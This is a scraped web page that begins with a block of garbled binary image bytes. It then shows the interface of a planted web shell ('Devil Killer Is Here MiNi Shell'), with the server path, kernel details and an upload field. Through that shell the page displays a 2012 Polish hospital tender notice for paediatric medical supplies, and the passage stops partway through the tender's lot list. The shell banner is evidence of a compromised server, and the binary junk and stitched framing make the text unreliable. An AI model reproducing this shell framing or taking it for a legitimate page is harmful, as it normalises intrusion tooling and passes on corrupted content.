JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120912/343226-N-2012.html

<p class="kh_header"><b>Katowice: Dostawy pomp do podaży diet enteralnych oraz zestawów do żywienia dojelitowego z użyciem pomp do podaży diet enteralnych, biotechnologicznych zestawów do otrzymywania osocza bogatopłytkowego oraz drobnego sprzętu medycznego jałowego</b><br>
<b>Numer ogłoszenia: 343226 - 2012; data zamieszczenia: 12.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 6 Śląskiego Uniwersytetu Medycznego w Katowicach Górnośląskie Centrum Zdrowia Dziecka im. Jana Pawła II , ul. Medyków 16, 40-752 Katowice, woj. śląskie, tel. (032) 207 15 32, faks (032) 2071546, 252 6303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gczd.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy pomp do podaży diet enteralnych oraz zestawów do żywienia dojelitowego z użyciem pomp do podaży diet enteralnych, biotechnologicznych zestawów do otrzymywania osocza bogatopłytkowego oraz drobnego sprzętu medycznego jałowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są sukcesywne na dostawy pomp do podaży diet enteralnych oraz zestawów do żywienia dojelitowego z użyciem pomp do podaży diet enteralnych, biotechnologicznych zestawów do otrzymywania osocza bogatopłytkowego oraz drobnego sprzętu medycznego jałowego.Zamawiający przedmiot zamówienia podzielił na 18 pakietów:
1.Pompy do podaży diet enteralnych i zestawy do pomp
2.Biotechnologiczny zestaw do otrzymywania osocza bogatopłytkowego
3.Osłony na sprzęt medyczny
4.Oxygenatory do aparatu ECMO+kaniule DUO
5.Przyrządy do przetaczania
6.Linie monitorujace
7.Igły angiograficzne
8.Zgłębniki żołądkowe 
9.Przewody do pompki perylstatycznej mikrowiertarki usznej
10.Elektrody do śródoperacyjnego monitoringu elektrofizjologicznego
11.Wkładki uszne do badania słuchu metodą BERA do aparatu Interakustic
12.Wkładki uszne do badań słuchu aparatem Biologic
13.Szczypce biopsyjne do kolonoskopii i gastroskopii
14.Elektrody samoprzylepne do aparatu Dura-Stick Tens
15.Akcesoria do stomii pediatrycznych
16.Kołnierze ortopedyczne
17.Komora wilgotna do osłony oka
18.Rękawice z nitrylu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: - posiadania uprawnień do wykonywania działalności będącej przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: - posiadania wiedzy i doświadczenia w zakresie objętym przedmiotem zamówienia. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: - dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia. Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: - dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: -sytuacji ekonomicznej i finansowej. Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów Zamawiający wymaga przedłożenia informacji, banku lub spółdzielczej kasy oszczędnościowo-kredytowej, posiadanych środków finansowych lub zdolności kredytowej tych podmiotów nie mniejszej niż 50 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a/ oświadczenie, że oferowany przedmiot zamówienia  posiada wszystkie wymagane dokumenty przepisami ustawy z dnia 20 maja 2010 r. o wyrobach medycznych /Dz. U z 2010 r Nr 107 poz. 679 dopuszczające oferowany przedmiot zamówienia do obrotu i używania w zakładach opieki zdrowotnej zgodnie z ustawą i, że dokumenty będą udostępniane na każde wezwanie Zamawiającego.b/ katalogi lub dokumenty producenta potwierdzające wymagane parametry dla każdej pozycji w pakiecie - dostarczone katalogi lub dokumenty producenta powinny być opisane, jakiego dotyczą Pakietu i pozycji w pakiecie.
c/ próbki.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia: 1). W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2). Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w pkt. 1). 3). W przypadku wspólnego ubiegania się o udzielenie zamówienia: a) wymóg posiadania uprawnień określonych w art. 22 ust 1 powinien spełniać ten Wykonawca, który będzie wykonywać część zamówienia objętego obowiązkiem posiadania uprawnień b) każdy z wykonawców ubiegających się wspólnie o zamówienie musi oddzielnie udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust 1 ustawy Pzp (składając dokumenty i oświadczenia określone przez Zamawiającego w części III.4.2)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo Zamówień publicznych, Zamawiający dopuszcza zmianę zawartej umowy w trakcie jej trwania, w następujących przypadkach:
a. obniżenia ceny jednostkowej przez Wykonawcę,
b. zmiany urzędowej stawki podatku VAT,
c. zmiany numeru katalogowego producenta,
d. zmiany terminu obowiązywania umowy w przypadku nie wykorzystania przez Zamawiającego w trakcie trwania umowy pełnej ilości dostarczanego przedmiotu umowy - przy zachowaniu dotychczasowej ceny,
e. zmiany producenta przedmiotu umowy, w przypadku gdy producent wskazany w ofercie przez Wykonawcę wycofał dany towar z produkcji - przy cenie nie większej niż w umowie lub jeżeli Wykonawca nie może zaoferować w takim przypadku towar innego producenta w cenie nie wyższej niż w umowie, rozwiązanie jej w zakresie dotyczącym tego towaru za porozumieniem stron, bez konieczności ponoszenia kary przez żadną ze stron umowy,
f. przedłużenia terminu płatności,
g. zmiany stawek opłat celnych wprowadzonych decyzjami odpowiednich władz państwowych.
h. W zakresie danych identyfikacyjnych strony umowy takich jak np. firma, adres osoby upoważnione do kontaktów/odbioru lub inne zapisy dotyczące wskazania stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gczd.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego pok. 18. Warunki płatności: przelew, gotówka lub za zaliczeniem pocztowym. Cena Specyfikacji Istotnych Warunków Zamówienia w wersji papierowej 10 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2012 godzina 11:30, miejsce: Siedziba Zamawiającego - Kancelaria pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pompy do podaży diet enteralnych i zestawy do pomp.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pompa do podaży diet enteralnych: dożołądkowych i dojelitowych, do stosowania stacjonarnego oraz przenośnego.  Pompa umożliwia precyzyjne ustawienie szybkości przepływu w zakresie 1-400ml/h; możliwość zasilania z akumulatora i sieci; z wizualną i akustyczna sygnalizacją problemów (komunikaty na czytelnym wyświetlaczu); masa pompy nieprzekraczająca 400g; odporna na zalanie wodą (możliwość mycia); 	szt.	3
2.Jałowy zestaw do żywienia dojelitowego służący do podłączenia opakowania diety (worek lub butelka) ze zgłębnikiem-dopuszcza się łącznik przejściowy. Zestaw umożliwia żywienie metodą ciągłego wlewu za pomocą pompy (patrz pkt1); możliwość wyboru wersji do zastosowania stacjonarnego lub mobilnego; Zestaw pakowany pojedynczo w folię.	szt.	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Biotechnologiczny zestaw do otrzymywania osocza bogatopłytkowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Biotechnologiczny, jałowy zestaw do pozyskiwania osocza bogatopłytkowego PRP (Platlet-Rich Plasma) metodą grawitacyjnej separacji płytek krwi. * *nieodpłatne użyczenie wirówki	 szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Osłony na sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Osłona na sprzęt medyczny, jałowa, 40cm x 25cm tolerancja +/-20%	szt.	1 000
2.Osłona na sprzęt medyczny, jałowa, 85cm x 150 cm tolerancja +/-20%	szt.	1 000
3.Jałowa serweta na stolik narzedziowy, 150 cm x 100 cm tolerancja +/-20%	szt.	1 000
4.Jałowe ręczniki celulozowe 30 cm x 40 cm	szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Oxygenatory do aparatu ECMO +kaniule.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Oxygenator do aparatu ECMO, pediatryczny z membraną dyfuzyjną do długoterminowego używania z zestawem drenów i głowicą do pompy centrafugalnej (biopompy) Rotaflow konsola RFC 20970	szt.	5
2.Kaniule DUO do aparatu ECMO 12 Fr, 15 Fr	szt.	20
Oksygenator pediatryczny z membraną dyfuzyjną do długoterminowego używania z zestawem drenów.
Powłoka heparynowo-polipeptydowa
Maksymalny czas stosowania do 30 dni
Przepływ krwi 0,2-2,8 l/min
Pole powierzchni membrany oksygenatora 0,8 m2
Pojemność oksygenatora 81 ml
Pole powierzchni wymiennika ciepła 0,15 m2
Wlot i wylot krwi ? cala
Wlot gazu ? cala, wylot gazu 3/8 cala
Włókna oksygenatora z polimetylopentenu
Włókna wymiennika ciepła z poliuretanu
Zestaw drenów do podłączenia
Instrukcja w j. polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przyrządy do przetaczania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przyrząd  do transfuzji wymiennej u noworodków, jałowy, niepirogenny, nietoksyczny	szt.	10
2.Przyrząd do szybkiego przetaczania krwi i preparatów krwiopochodnych, jałowy, niepirogenny, nietoksyczny	szt.	130
3.Przyrząd do przetaczania krwi z dozownikiem do precyzyjnego podawania, jałowy, niepirogenny, nietoksyczny	szt.	4800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Linie monitorujące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Linia monitorująca pediatryczna z przetwornikiem, pojedyncza, do pomiaru krwawego ciśnienia metodą bezpośrednią z szybkością przepłukiwania na pompę, kompatybilna z posiadanymi przez szpital monitorami. Długość linii z przetwornikiem >120cm lub zestaw: linia z przetwornikiem ok. 60cm plus linia tętnicza >100cm. Złącze bezpinowe z wodoszczelnym kapturkiem.
szt.	100
1.1.Płytki do mocowania czujnika dla linii monitorującej z poz. 1	szt.	20
2.Linia monitorująca pediatryczna z przetwornikiem, podwójna do pomiaru krwawego ciśnienia, metodą bezpośrednią z szybkością przepłukiwania przez pompę infuzyjną strzykawkową, kompatybilna z przewodami posiadanymi przez szpital monitorami. Długość linii z przetwornikiem min. 150cm (+/- 10cm).Złącze bezpinowe z wodoszczelnym kapturkiem.
 W skład zestawu wchodzi:
1. linia tętnicza ze zintegrowaną strzykawką do aspiracji krwi tętniczej o pojemności 3 ml, cechowana co 1ml z blokadą chroniącą przed przypadkowym wyciągnięciem tłoka oraz ze zintegrowaną zastawką bezigłową do pobierania krwi do badań
2. linia żylna z jednym kranikiem
szt.	220
2.1.Płytki do mocowania czujnika dla linii monitorującej z poz. 2 - płytki podwójne (dopuszcza się  płytki pojedyńcze w ilości 88 szt.)	szt.	44
3.Linia monitorująca pediatryczna z przetwornikiem, pojedyncza do pomiaru krwawego ciśnienia,  podwójny do pomiaru ciśnienia metodą bezpośrednią z szybkością przepłukiwania przez pompę  infuzyjną strzykawkową, kompatybilna z przewodami posiadanymi przez szpital monitorami. Długość linii z przetwornikiem min. 150cm (+/- 10cm).Złącze bezpinowe z  
 wodoszczelnym  kapturkiem. Linia ze zintegrowaną strzykawką do aspiracji krwi tętniczej o  pojemności 3 ml,  cechowana co 1ml z blokadą chroniącą przed przypadkowym wyciągnięciem  tłoka  oraz ze zintegrowaną zastawką bezigłową do pobierania krwi do badań.
	szt.	70
3.1.Płytki do mocowania czujnika dla linii monitorującej z poz. 3	szt.	14
4.Imadełka do płytek poz. 1,2,3	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
